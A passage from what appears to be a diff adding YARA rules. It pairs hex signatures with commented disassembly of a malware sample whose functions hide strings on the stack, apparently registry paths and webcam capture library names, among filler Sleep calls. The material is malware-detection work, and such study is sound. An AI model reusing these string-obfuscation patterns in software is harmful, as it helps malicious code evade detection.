esp,1064 + .text:0x004034d7 c3 ret + */ + $c1 = { 81 EC 28 04 00 00 56 57 B9 FF 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 F3 AB 8B 35 ?? ?? ?? ?? 6A 00 66 AB AA FF D6 B9 00 01 00 00 33 C0 8D 7C 24 ?? 50 F3 AB FF D6 B0 65 B2 53 88 44 24 ?? 88 44 24 ?? 88 44 24 ?? 88 44 24 ?? B1 72 B0 73 6A 00 88 54 24 ?? C6 44 24 ?? 59 88 54 24 ?? C6 44 24 ?? 54 C6 44 24 ?? 45 C6 44 24 ?? 4D C6 44 24 ?? 5C C6 44 24 ?? 43 C6 44 24 ?? 75 88 4C 24 ?? 88 4C 24 ?? C6 44 24 ?? 6E C6 44 24 ?? 74 C6 44 24 ?? 43 C6 44 24 ?? 6F C6 44 24 ?? 6E C6 44 24 ?? 74 88 4C 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 6C 88 54 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 5C 88 54 24 ?? 88 4C 24 ?? C6 44 24 ?? 76 C6 44 24 ?? 69 C6 44 24 ?? 63 88 44 24 ?? C6 44 24 ?? 5C C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 00 FF D6 8B 84 24 ?? ?? ?? ?? 8D 4C 24 ?? 50 8D 54 24 ?? 51 52 FF 15 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D6 8B BC 24 ?? ?? ?? ?? 6A 00 57 FF 15 ?? ?? ?? ?? 50 8B 84 24 ?? ?? ?? ?? 
57 6A 01 50 8D 4C 24 ?? 51 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 1C 6A 00 FF D6 5F 5E 81 C4 28 04 00 00 C3 } + /* +Basic Block at 0x00404cd0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00404cd0 + .text:0x00404cd0 FUNC: int cdecl sub_00404cd0( ) [2 XREFS] + .text:0x00404cd0 + .text:0x00404cd0 Stack Variables: (offset from initial top of stack) + .text:0x00404cd0 -2: int local2 + .text:0x00404cd0 -3: int local3 + .text:0x00404cd0 -4: int local4 + .text:0x00404cd0 -5: int local5 + .text:0x00404cd0 -6: int local6 + .text:0x00404cd0 -7: int local7 + .text:0x00404cd0 -8: int local8 + .text:0x00404cd0 -9: int local9 + .text:0x00404cd0 -10: int local10 + .text:0x00404cd0 -11: int local11 + .text:0x00404cd0 -12: int local12 + .text:0x00404cd0 -13: int local13 + .text:0x00404cd0 -14: int local14 + .text:0x00404cd0 -15: int local15 + .text:0x00404cd0 -16: int local16 + .text:0x00404cd0 -17: int local17 + .text:0x00404cd0 -18: int local18 + .text:0x00404cd0 -19: int local19 + .text:0x00404cd0 -20: int local20 + .text:0x00404cd0 -21: int local21 + .text:0x00404cd0 -22: int local22 + .text:0x00404cd0 -23: int local23 + .text:0x00404cd0 -24: int local24 + .text:0x00404cd0 -25: int local25 + .text:0x00404cd0 -26: int local26 + .text:0x00404cd0 -27: int local27 + .text:0x00404cd0 -28: int local28 + .text:0x00404cd0 -29: int local29 + .text:0x00404cd0 -30: int local30 + .text:0x00404cd0 -31: int local31 + .text:0x00404cd0 -32: int local32 + .text:0x00404cd0 -33: int local33 + .text:0x00404cd0 -34: int local34 + .text:0x00404cd0 -35: int local35 + .text:0x00404cd0 -36: int local36 + .text:0x00404cd0 -37: int local37 + .text:0x00404cd0 -38: int local38 + .text:0x00404cd0 -39: int local39 + .text:0x00404cd0 -40: int local40 + .text:0x00404cd0 -41: int local41 + .text:0x00404cd0 -42: int local42 + .text:0x00404cd0 -43: int local43 + .text:0x00404cd0 -44: int local44 + .text:0x00404cd0 -45: int local45 + .text:0x00404cd0 -46: int local46 
+ .text:0x00404cd0 -47: int local47 + .text:0x00404cd0 -48: int local48 + .text:0x00404cd0 -52: int local52 + .text:0x00404cd0 -53: int local53 + .text:0x00404cd0 -54: int local54 + .text:0x00404cd0 -55: int local55 + .text:0x00404cd0 -56: int local56 + .text:0x00404cd0 -60: int local60 + .text:0x00404cd0 -64: int local64 + .text:0x00404cd0 -68: int local68 + .text:0x00404cd0 -72: int local72 + .text:0x00404cd0 + .text:0x00404cd0 83ec48 sub esp,72 + .text:0x00404cd3 53 push ebx + .text:0x00404cd4 b344 mov bl,68 + .text:0x00404cd6 b145 mov cl,69 + .text:0x00404cd8 885c241f mov byte [esp + 31],bl + .text:0x00404cdc 885c2425 mov byte [esp + 37],bl + .text:0x00404ce0 884c2423 mov byte [esp + 35],cl + .text:0x00404ce4 884c2426 mov byte [esp + 38],cl + .text:0x00404ce8 b353 mov bl,83 + .text:0x00404cea b804000000 mov eax,4 + .text:0x00404cef b149 mov cl,73 + .text:0x00404cf1 885c2427 mov byte [esp + 39],bl + .text:0x00404cf5 885c2431 mov byte [esp + 49],bl + .text:0x00404cf9 89442408 mov dword [esp + 8],eax + .text:0x00404cfd 8944240c mov dword [esp + 12],eax + .text:0x00404d01 884c242a mov byte [esp + 42],cl + .text:0x00404d05 884c242d mov byte [esp + 45],cl + .text:0x00404d09 b373 mov bl,115 + .text:0x00404d0b b041 mov al,65 + .text:0x00404d0d b252 mov dl,82 + .text:0x00404d0f b174 mov cl,116 + .text:0x00404d11 885c2433 mov byte [esp + 51],bl + .text:0x00404d15 885c2444 mov byte [esp + 68],bl + .text:0x00404d19 885c2445 mov byte [esp + 69],bl + .text:0x00404d1d 8844241d mov byte [esp + 29],al + .text:0x00404d21 8854241e mov byte [esp + 30],dl + .text:0x00404d25 88442421 mov byte [esp + 33],al + .text:0x00404d29 88542422 mov byte [esp + 34],dl + .text:0x00404d2d 88542429 mov byte [esp + 41],dl + .text:0x00404d31 884c2434 mov byte [esp + 52],cl + .text:0x00404d35 884c243b mov byte [esp + 59],cl + .text:0x00404d39 33db xor ebx,ebx + .text:0x00404d3b 56 push esi + .text:0x00404d3c 8b3578904000 mov esi,dword [0x00409078] + .text:0x00404d42 b05c mov al,92 + .text:0x00404d44 
b265 mov dl,101 + .text:0x00404d46 b172 mov cl,114 + .text:0x00404d48 53 push ebx + .text:0x00404d49 c644242448 mov byte [esp + 36],72 + .text:0x00404d4e c644242857 mov byte [esp + 40],87 + .text:0x00404d53 8844242c mov byte [esp + 44],al + .text:0x00404d57 c644243043 mov byte [esp + 48],67 + .text:0x00404d5c c644243350 mov byte [esp + 51],80 + .text:0x00404d61 c644243454 mov byte [esp + 52],84 + .text:0x00404d66 c64424364f mov byte [esp + 54],79 + .text:0x00404d6b c64424374e mov byte [esp + 55],78 + .text:0x00404d70 88442438 mov byte [esp + 56],al + .text:0x00404d74 c644243a79 mov byte [esp + 58],121 + .text:0x00404d79 8854243d mov byte [esp + 61],dl + .text:0x00404d7d c644243e6d mov byte [esp + 62],109 + .text:0x00404d82 8844243f mov byte [esp + 63],al + .text:0x00404d86 c644244043 mov byte [esp + 64],67 + .text:0x00404d8b 88542441 mov byte [esp + 65],dl + .text:0x00404d8f c64424426e mov byte [esp + 66],110 + .text:0x00404d94 884c2444 mov byte [esp + 68],cl + .text:0x00404d98 c644244561 mov byte [esp + 69],97 + .text:0x00404d9d c64424466c mov byte [esp + 70],108 + .text:0x00404da2 c644244750 mov byte [esp + 71],80 + .text:0x00404da7 884c2448 mov byte [esp + 72],cl + .text:0x00404dab c64424496f mov byte [esp + 73],111 + .text:0x00404db0 c644244a63 mov byte [esp + 74],99 + .text:0x00404db5 8854244b mov byte [esp + 75],dl + .text:0x00404db9 c644244e6f mov byte [esp + 78],111 + .text:0x00404dbe 884c244f mov byte [esp + 79],cl + .text:0x00404dc2 88442450 mov byte [esp + 80],al + .text:0x00404dc6 c644245130 mov byte [esp + 81],48 + .text:0x00404dcb 885c2452 mov byte [esp + 82],bl + .text:0x00404dcf ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404dd1 8d442408 lea eax,dword [esp + 8] + .text:0x00404dd5 8d4c2420 lea ecx,dword [esp + 32] + .text:0x00404dd9 50 push eax + .text:0x00404dda 51 push ecx + .text:0x00404ddb 6802000080 push 0x80000002 + .text:0x00404de0 ff1520904000 call dword [0x00409020] ;advapi32.RegOpenKeyA(0x80000002,local48,local72) + .text:0x00404de6 53 
push ebx + .text:0x00404de7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404de9 c64424187e mov byte [esp + 24],126 + .text:0x00404dee c64424194d mov byte [esp + 25],77 + .text:0x00404df3 c644241a48 mov byte [esp + 26],72 + .text:0x00404df8 c644241b7a mov byte [esp + 27],122 + .text:0x00404dfd 885c241c mov byte [esp + 28],bl + .text:0x00404e01 53 push ebx + .text:0x00404e02 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404e04 8d54240c lea edx,dword [esp + 12] + .text:0x00404e08 8d442414 lea eax,dword [esp + 20] + .text:0x00404e0c 52 push edx + .text:0x00404e0d 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00404e11 50 push eax + .text:0x00404e12 8b442410 mov eax,dword [esp + 16] + .text:0x00404e16 51 push ecx + .text:0x00404e17 8d542424 lea edx,dword [esp + 36] + .text:0x00404e1b 53 push ebx + .text:0x00404e1c 52 push edx + .text:0x00404e1d 50 push eax + .text:0x00404e1e ff1508904000 call dword [0x00409008] ;advapi32.RegQueryValueExA(0xfefefefe,local56,0,local64,local60,local68) + .text:0x00404e24 53 push ebx + .text:0x00404e25 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404e27 8b4c2408 mov ecx,dword [esp + 8] + .text:0x00404e2b 51 push ecx + .text:0x00404e2c ff150c904000 call dword [0x0040900c] ;advapi32.RegCloseKey(0xfefefefe) + .text:0x00404e32 53 push ebx + .text:0x00404e33 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404e35 8b442414 mov eax,dword [esp + 20] + .text:0x00404e39 5e pop esi + .text:0x00404e3a 5b pop ebx + .text:0x00404e3b 83c448 add esp,72 + .text:0x00404e3e c3 ret + */ + $c2 = { 83 EC 48 53 B3 44 B1 45 88 5C 24 ?? 88 5C 24 ?? 88 4C 24 ?? 88 4C 24 ?? B3 53 B8 04 00 00 00 B1 49 88 5C 24 ?? 88 5C 24 ?? 89 44 24 ?? 89 44 24 ?? 88 4C 24 ?? 88 4C 24 ?? B3 73 B0 41 B2 52 B1 74 88 5C 24 ?? 88 5C 24 ?? 88 5C 24 ?? 88 44 24 ?? 88 54 24 ?? 88 44 24 ?? 88 54 24 ?? 88 54 24 ?? 88 4C 24 ?? 88 4C 24 ?? 33 DB 56 8B 35 ?? ?? ?? ?? B0 5C B2 65 B1 72 53 C6 44 24 ?? 48 C6 44 24 ?? 57 88 44 24 ?? C6 44 24 ?? 43 C6 44 24 ?? 50 C6 44 24 ?? 54 C6 44 24 ?? 4F C6 44 24 ?? 
4E 88 44 24 ?? C6 44 24 ?? 79 88 54 24 ?? C6 44 24 ?? 6D 88 44 24 ?? C6 44 24 ?? 43 88 54 24 ?? C6 44 24 ?? 6E 88 4C 24 ?? C6 44 24 ?? 61 C6 44 24 ?? 6C C6 44 24 ?? 50 88 4C 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 63 88 54 24 ?? C6 44 24 ?? 6F 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 30 88 5C 24 ?? FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 68 02 00 00 80 FF 15 ?? ?? ?? ?? 53 FF D6 C6 44 24 ?? 7E C6 44 24 ?? 4D C6 44 24 ?? 48 C6 44 24 ?? 7A 88 5C 24 ?? 53 FF D6 8D 54 24 ?? 8D 44 24 ?? 52 8D 4C 24 ?? 50 8B 44 24 ?? 51 8D 54 24 ?? 53 52 50 FF 15 ?? ?? ?? ?? 53 FF D6 8B 4C 24 ?? 51 FF 15 ?? ?? ?? ?? 53 FF D6 8B 44 24 ?? 5E 5B 83 C4 48 C3 } + /* +Basic Block at 0x00404e40@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00404e40 + .text:0x00404e40 FUNC: int cdecl sub_00404e40( ) [2 XREFS] + .text:0x00404e40 + .text:0x00404e40 Stack Variables: (offset from initial top of stack) + .text:0x00404e40 -100: int local100 + .text:0x00404e40 -152: int local152 + .text:0x00404e40 -156: int local156 + .text:0x00404e40 -157: int local157 + .text:0x00404e40 -158: int local158 + .text:0x00404e40 -159: int local159 + .text:0x00404e40 -160: int local160 + .text:0x00404e40 -161: int local161 + .text:0x00404e40 -162: int local162 + .text:0x00404e40 -163: int local163 + .text:0x00404e40 -164: int local164 + .text:0x00404e40 -165: int local165 + .text:0x00404e40 -166: int local166 + .text:0x00404e40 -167: int local167 + .text:0x00404e40 -168: int local168 + .text:0x00404e40 -169: int local169 + .text:0x00404e40 -170: int local170 + .text:0x00404e40 -171: int local171 + .text:0x00404e40 -172: int local172 + .text:0x00404e40 -173: int local173 + .text:0x00404e40 -174: int local174 + .text:0x00404e40 -175: int local175 + .text:0x00404e40 -176: int local176 + .text:0x00404e40 -177: int local177 + .text:0x00404e40 -178: int local178 + .text:0x00404e40 -179: int local179 + .text:0x00404e40 -180: int local180 + .text:0x00404e40 -184: int local184 + .text:0x00404e40 
-185: int local185 + .text:0x00404e40 -186: int local186 + .text:0x00404e40 -187: int local187 + .text:0x00404e40 -188: int local188 + .text:0x00404e40 -189: int local189 + .text:0x00404e40 -190: int local190 + .text:0x00404e40 -191: int local191 + .text:0x00404e40 -192: int local192 + .text:0x00404e40 -193: int local193 + .text:0x00404e40 -194: int local194 + .text:0x00404e40 -195: int local195 + .text:0x00404e40 -196: int local196 + .text:0x00404e40 + .text:0x00404e40 81ecc4000000 sub esp,196 + .text:0x00404e46 53 push ebx + .text:0x00404e47 55 push ebp + .text:0x00404e48 8b2d78904000 mov ebp,dword [0x00409078] + .text:0x00404e4e 56 push esi + .text:0x00404e4f b06c mov al,108 + .text:0x00404e51 57 push edi + .text:0x00404e52 33ff xor edi,edi + .text:0x00404e54 8844241a mov byte [esp + 26],al + .text:0x00404e58 8844241b mov byte [esp + 27],al + .text:0x00404e5c b341 mov bl,65 + .text:0x00404e5e b265 mov dl,101 + .text:0x00404e60 b172 mov cl,114 + .text:0x00404e62 b069 mov al,105 + .text:0x00404e64 57 push edi + .text:0x00404e65 885c2414 mov byte [esp + 20],bl + .text:0x00404e69 c644241556 mov byte [esp + 21],86 + .text:0x00404e6e c644241649 mov byte [esp + 22],73 + .text:0x00404e73 c644241743 mov byte [esp + 23],67 + .text:0x00404e78 885c2418 mov byte [esp + 24],bl + .text:0x00404e7c c644241950 mov byte [esp + 25],80 + .text:0x00404e81 c644241a33 mov byte [esp + 26],51 + .text:0x00404e86 c644241b32 mov byte [esp + 27],50 + .text:0x00404e8b c644241c2e mov byte [esp + 28],46 + .text:0x00404e90 c644241d64 mov byte [esp + 29],100 + .text:0x00404e95 c644242000 mov byte [esp + 32],0 + .text:0x00404e9a c644242463 mov byte [esp + 36],99 + .text:0x00404e9f c644242561 mov byte [esp + 37],97 + .text:0x00404ea4 c644242670 mov byte [esp + 38],112 + .text:0x00404ea9 c644242747 mov byte [esp + 39],71 + .text:0x00404eae 88542428 mov byte [esp + 40],dl + .text:0x00404eb2 c644242974 mov byte [esp + 41],116 + .text:0x00404eb7 c644242a44 mov byte [esp + 42],68 + .text:0x00404ebc 
884c242b mov byte [esp + 43],cl + .text:0x00404ec0 8844242c mov byte [esp + 44],al + .text:0x00404ec4 c644242d76 mov byte [esp + 45],118 + .text:0x00404ec9 8854242e mov byte [esp + 46],dl + .text:0x00404ecd 884c242f mov byte [esp + 47],cl + .text:0x00404ed1 c644243044 mov byte [esp + 48],68 + .text:0x00404ed6 88542431 mov byte [esp + 49],dl + .text:0x00404eda c644243273 mov byte [esp + 50],115 + .text:0x00404edf c644243363 mov byte [esp + 51],99 + .text:0x00404ee4 884c2434 mov byte [esp + 52],cl + .text:0x00404ee8 88442435 mov byte [esp + 53],al + .text:0x00404eec c644243670 mov byte [esp + 54],112 + .text:0x00404ef1 c644243774 mov byte [esp + 55],116 + .text:0x00404ef6 88442438 mov byte [esp + 56],al + .text:0x00404efa c64424396f mov byte [esp + 57],111 + .text:0x00404eff c644243a6e mov byte [esp + 58],110 + .text:0x00404f04 885c243b mov byte [esp + 59],bl + .text:0x00404f08 c644243c00 mov byte [esp + 60],0 + .text:0x00404f0d ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00404f0f 8d442420 lea eax,dword [esp + 32] + .text:0x00404f13 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00404f17 50 push eax + .text:0x00404f18 51 push ecx + .text:0x00404f19 ff15ec904000 call dword [0x004090ec] ;kernel32.LoadLibraryA(local196) + .text:0x00404f1f 50 push eax + .text:0x00404f20 ff15e8904000 call dword [0x004090e8] ;kernel32.GetProcAddress(avicap32,local180) + .text:0x00404f26 8bd8 mov ebx,eax + .text:0x00404f28 33f6 xor esi,esi + */ + $c3 = { 81 EC C4 00 00 00 53 55 8B 2D ?? ?? ?? ?? 56 B0 6C 57 33 FF 88 44 24 ?? 88 44 24 ?? B3 41 B2 65 B1 72 B0 69 57 88 5C 24 ?? C6 44 24 ?? 56 C6 44 24 ?? 49 C6 44 24 ?? 43 88 5C 24 ?? C6 44 24 ?? 50 C6 44 24 ?? 33 C6 44 24 ?? 32 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 00 C6 44 24 ?? 63 C6 44 24 ?? 61 C6 44 24 ?? 70 C6 44 24 ?? 47 88 54 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 44 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 76 88 54 24 ?? 88 4C 24 ?? C6 44 24 ?? 44 88 54 24 ?? C6 44 24 ?? 73 C6 44 24 ?? 63 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 70 C6 44 24 ?? 
74 88 44 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 6E 88 5C 24 ?? C6 44 24 ?? 00 FF D5 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 33 F6 } + /* +Basic Block at 0x00404f60@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00404f60 + .text:0x00404f60 FUNC: int cdecl sub_00404f60( int arg0, int arg1, int arg2, int arg3, ) [8 XREFS] + .text:0x00404f60 + .text:0x00404f60 Stack Variables: (offset from initial top of stack) + .text:0x00404f60 16: int arg3 + .text:0x00404f60 12: int arg2 + .text:0x00404f60 8: int arg1 + .text:0x00404f60 4: int arg0 + .text:0x00404f60 -1023: int local1023 + .text:0x00404f60 -1024: int local1024 + .text:0x00404f60 -1028: int local1028 + .text:0x00404f60 -1029: int local1029 + .text:0x00404f60 -1030: int local1030 + .text:0x00404f60 -1031: int local1031 + .text:0x00404f60 -1032: int local1032 + .text:0x00404f60 -1033: int local1033 + .text:0x00404f60 -1034: int local1034 + .text:0x00404f60 -1035: int local1035 + .text:0x00404f60 -1036: int local1036 + .text:0x00404f60 -1037: int local1037 + .text:0x00404f60 -1038: int local1038 + .text:0x00404f60 -1039: int local1039 + .text:0x00404f60 -1040: int local1040 + .text:0x00404f60 -1041: int local1041 + .text:0x00404f60 -1042: int local1042 + .text:0x00404f60 -1043: int local1043 + .text:0x00404f60 -1044: int local1044 + .text:0x00404f60 -1045: int local1045 + .text:0x00404f60 -1046: int local1046 + .text:0x00404f60 -1047: int local1047 + .text:0x00404f60 -1048: int local1048 + .text:0x00404f60 -1049: int local1049 + .text:0x00404f60 -1050: int local1050 + .text:0x00404f60 -1051: int local1051 + .text:0x00404f60 -1052: int local1052 + .text:0x00404f60 -1053: int local1053 + .text:0x00404f60 -1054: int local1054 + .text:0x00404f60 -1055: int local1055 + .text:0x00404f60 -1056: int local1056 + .text:0x00404f60 -1057: int local1057 + .text:0x00404f60 -1058: int local1058 + .text:0x00404f60 -1059: int local1059 + .text:0x00404f60 
-1060: int local1060 + .text:0x00404f60 -1061: int local1061 + .text:0x00404f60 -1062: int local1062 + .text:0x00404f60 -1063: int local1063 + .text:0x00404f60 -1064: int local1064 + .text:0x00404f60 + .text:0x00404f60 81ec28040000 sub esp,1064 + .text:0x00404f66 53 push ebx + .text:0x00404f67 55 push ebp + .text:0x00404f68 56 push esi + .text:0x00404f69 8b3578904000 mov esi,dword [0x00409078] + .text:0x00404f6f 57 push edi + .text:0x00404f70 6a00 push 0 + .text:0x00404f72 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404f74 6a00 push 0 + .text:0x00404f76 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404f78 b9ff000000 mov ecx,255 + .text:0x00404f7d 33c0 xor eax,eax + .text:0x00404f7f 8d7c2439 lea edi,dword [esp + 57] + .text:0x00404f83 c644243800 mov byte [esp + 56],0 + .text:0x00404f88 f3ab rep: stosd + .text:0x00404f8a 66ab stosd + .text:0x00404f8c 6a00 push 0 + .text:0x00404f8e aa stosb + .text:0x00404f8f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404f91 6a00 push 0 + .text:0x00404f93 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404f95 6a00 push 0 + .text:0x00404f97 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404f99 8bac2448040000 mov ebp,dword [esp + 1096] + .text:0x00404fa0 8b9c2444040000 mov ebx,dword [esp + 1092] + .text:0x00404fa7 8bcd mov ecx,ebp + .text:0x00404fa9 33c0 xor eax,eax + .text:0x00404fab 8bd1 mov edx,ecx + .text:0x00404fad 8bfb mov edi,ebx + .text:0x00404faf c1e902 shr ecx,2 + .text:0x00404fb2 f3ab rep: stosd + .text:0x00404fb4 8bca mov ecx,edx + .text:0x00404fb6 6a00 push 0 + .text:0x00404fb8 83e103 and ecx,3 + .text:0x00404fbb f3aa rep: stosb + .text:0x00404fbd ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404fbf b900010000 mov ecx,256 + .text:0x00404fc4 33c0 xor eax,eax + .text:0x00404fc6 8d7c2438 lea edi,dword [esp + 56] + .text:0x00404fca 50 push eax + .text:0x00404fcb f3ab rep: stosd + .text:0x00404fcd ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404fcf b065 mov al,101 + .text:0x00404fd1 b253 mov dl,83 + .text:0x00404fd3 8844241b mov 
byte [esp + 27],al + .text:0x00404fd7 88442426 mov byte [esp + 38],al + .text:0x00404fdb 8844242a mov byte [esp + 42],al + .text:0x00404fdf 8844242f mov byte [esp + 47],al + .text:0x00404fe3 b172 mov cl,114 + .text:0x00404fe5 b073 mov al,115 + .text:0x00404fe7 88542410 mov byte [esp + 16],dl + .text:0x00404feb c644241159 mov byte [esp + 17],89 + .text:0x00404ff0 88542412 mov byte [esp + 18],dl + .text:0x00404ff4 c644241354 mov byte [esp + 19],84 + .text:0x00404ff9 c644241445 mov byte [esp + 20],69 + .text:0x00404ffe c64424154d mov byte [esp + 21],77 + .text:0x00405003 c64424165c mov byte [esp + 22],92 + .text:0x00405008 c644241743 mov byte [esp + 23],67 + .text:0x0040500d c644241875 mov byte [esp + 24],117 + .text:0x00405012 884c2419 mov byte [esp + 25],cl + .text:0x00405016 884c241a mov byte [esp + 26],cl + .text:0x0040501a c644241c6e mov byte [esp + 28],110 + .text:0x0040501f c644241d74 mov byte [esp + 29],116 + .text:0x00405024 c644241e43 mov byte [esp + 30],67 + .text:0x00405029 c644241f6f mov byte [esp + 31],111 + .text:0x0040502e c64424206e mov byte [esp + 32],110 + .text:0x00405033 c644242174 mov byte [esp + 33],116 + .text:0x00405038 884c2422 mov byte [esp + 34],cl + .text:0x0040503c c64424236f mov byte [esp + 35],111 + .text:0x00405041 c64424246c mov byte [esp + 36],108 + .text:0x00405046 88542425 mov byte [esp + 37],dl + .text:0x0040504a c644242774 mov byte [esp + 39],116 + .text:0x0040504f c64424285c mov byte [esp + 40],92 + .text:0x00405054 88542429 mov byte [esp + 41],dl + .text:0x00405058 884c242b mov byte [esp + 43],cl + .text:0x0040505c c644242c76 mov byte [esp + 44],118 + .text:0x00405061 c644242d69 mov byte [esp + 45],105 + .text:0x00405066 c644242e63 mov byte [esp + 46],99 + .text:0x0040506b 88442430 mov byte [esp + 48],al + .text:0x0040506f c64424315c mov byte [esp + 49],92 + .text:0x00405074 c644243225 mov byte [esp + 50],37 + .text:0x00405079 88442433 mov byte [esp + 51],al + .text:0x0040507d 6a00 push 0 + .text:0x0040507f c644243800 mov byte 
[esp + 56],0 + .text:0x00405084 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405086 6a00 push 0 + .text:0x00405088 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040508a 6a00 push 0 + .text:0x0040508c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040508e 6a00 push 0 + .text:0x00405090 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405092 6a00 push 0 + .text:0x00405094 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405096 8b84243c040000 mov eax,dword [esp + 1084] + .text:0x0040509d 8d4c2410 lea ecx,dword [esp + 16] + .text:0x004050a1 50 push eax + .text:0x004050a2 8d54243c lea edx,dword [esp + 60] + .text:0x004050a6 51 push ecx + .text:0x004050a7 52 push edx + .text:0x004050a8 ff15d8914000 call dword [0x004091d8] ;user32.wsprintfA(local1024,local1064) + .text:0x004050ae 83c40c add esp,12 + .text:0x004050b1 6a00 push 0 + .text:0x004050b3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004050b5 6a00 push 0 + .text:0x004050b7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004050b9 8b842440040000 mov eax,dword [esp + 1088] + .text:0x004050c0 6a00 push 0 + .text:0x004050c2 55 push ebp + .text:0x004050c3 6a00 push 0 + .text:0x004050c5 53 push ebx + .text:0x004050c6 6a01 push 1 + .text:0x004050c8 8d4c244c lea ecx,dword [esp + 76] + .text:0x004050cc 50 push eax + .text:0x004050cd 51 push ecx + .text:0x004050ce 6802000080 push 0x80000002 + .text:0x004050d3 e8b8f9ffff call 0x00404a90 ;sub_00404a90(0x80000002,local1024,arg1,1,arg2,0,arg3,0) + .text:0x004050d8 83c420 add esp,32 + .text:0x004050db 6a00 push 0 + .text:0x004050dd ffd6 call esi ;kernel32.Sleep(0) + .text:0x004050df 5f pop edi + .text:0x004050e0 5e pop esi + .text:0x004050e1 5d pop ebp + .text:0x004050e2 5b pop ebx + .text:0x004050e3 81c428040000 add esp,1064 + .text:0x004050e9 c3 ret + */ + $c4 = { 81 EC 28 04 00 00 53 55 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 6A 00 FF D6 B9 FF 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 F3 AB 66 AB 6A 00 AA FF D6 6A 00 FF D6 6A 00 FF D6 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 
8B CD 33 C0 8B D1 8B FB C1 E9 02 F3 AB 8B CA 6A 00 83 E1 03 F3 AA FF D6 B9 00 01 00 00 33 C0 8D 7C 24 ?? 50 F3 AB FF D6 B0 65 B2 53 88 44 24 ?? 88 44 24 ?? 88 44 24 ?? 88 44 24 ?? B1 72 B0 73 88 54 24 ?? C6 44 24 ?? 59 88 54 24 ?? C6 44 24 ?? 54 C6 44 24 ?? 45 C6 44 24 ?? 4D C6 44 24 ?? 5C C6 44 24 ?? 43 C6 44 24 ?? 75 88 4C 24 ?? 88 4C 24 ?? C6 44 24 ?? 6E C6 44 24 ?? 74 C6 44 24 ?? 43 C6 44 24 ?? 6F C6 44 24 ?? 6E C6 44 24 ?? 74 88 4C 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 6C 88 54 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 5C 88 54 24 ?? 88 4C 24 ?? C6 44 24 ?? 76 C6 44 24 ?? 69 C6 44 24 ?? 63 88 44 24 ?? C6 44 24 ?? 5C C6 44 24 ?? 25 88 44 24 ?? 6A 00 C6 44 24 ?? 00 FF D6 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 8B 84 24 ?? ?? ?? ?? 8D 4C 24 ?? 50 8D 54 24 ?? 51 52 FF 15 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D6 6A 00 FF D6 8B 84 24 ?? ?? ?? ?? 6A 00 55 6A 00 53 6A 01 8D 4C 24 ?? 50 51 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 20 6A 00 FF D6 5F 5E 5D 5B 81 C4 28 04 00 00 C3 } + /* +Basic Block at 0x004056e0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x004056e0 + .text:0x004056e0 FUNC: int cdecl sub_004056e0( int arg0, int arg1, ) [2 XREFS] + .text:0x004056e0 + .text:0x004056e0 Stack Variables: (offset from initial top of stack) + .text:0x004056e0 8: int arg1 + .text:0x004056e0 4: int arg0 + .text:0x004056e0 -3: int local3 + .text:0x004056e0 -4: int local4 + .text:0x004056e0 -5: int local5 + .text:0x004056e0 -6: int local6 + .text:0x004056e0 -7: int local7 + .text:0x004056e0 -8: int local8 + .text:0x004056e0 -9: int local9 + .text:0x004056e0 -10: int local10 + .text:0x004056e0 -11: int local11 + .text:0x004056e0 -12: int local12 + .text:0x004056e0 -13: int local13 + .text:0x004056e0 -14: int local14 + .text:0x004056e0 -15: int local15 + .text:0x004056e0 -16: int local16 + .text:0x004056e0 -17: int local17 + .text:0x004056e0 -18: int local18 + .text:0x004056e0 -19: int local19 + .text:0x004056e0 -20: int local20 + .text:0x004056e0 -21: 
